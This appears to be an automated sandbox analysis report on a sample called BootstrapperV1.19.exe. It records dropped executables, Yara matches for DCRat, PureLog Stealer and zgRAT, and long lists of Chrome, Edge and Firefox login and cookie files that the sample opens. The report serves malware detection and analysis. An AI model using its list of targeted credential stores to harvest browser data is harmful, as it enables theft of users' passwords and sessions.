Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe

Code function: 3_2_00D3DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

3_2_00D3DF1E

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe

Code function: 3_2_00D2B146 GetVersionExW,

3_2_00D2B146

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0000000D.00000002.2305646369.000000001348B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PerfNET.exe PID: 6520, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: BootstrapperV1.19.exe, type: SAMPLE
Source: Yara match	File source: 3.3.Solaraexecutor.exe.4f5070b.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Solaraexecutor.exe.506570b.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Solaraexecutor.exe.506570b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Solaraexecutor.exe.4f5070b.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.BootstrapperV1.19.exe.32b771a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.PerfNET.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.54ab86.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.4fc494.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.409294.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000000.1994292109.0000000000E02000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1697999893.0000000004F02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1698866320.0000000005017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1695171822.0000000003269000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1688952530.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\ELAMBKUP\SIHClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Default\AppData\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: BootstrapperV1.19.exe, type: SAMPLE
Source: Yara match	File source: 3.3.Solaraexecutor.exe.4f5070b.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Solaraexecutor.exe.506570b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Solaraexecutor.exe.4f5070b.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.BootstrapperV1.19.exe.32b771a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.PerfNET.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.54ab86.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.4fc494.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.409294.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\ELAMBKUP\SIHClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Default\AppData\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
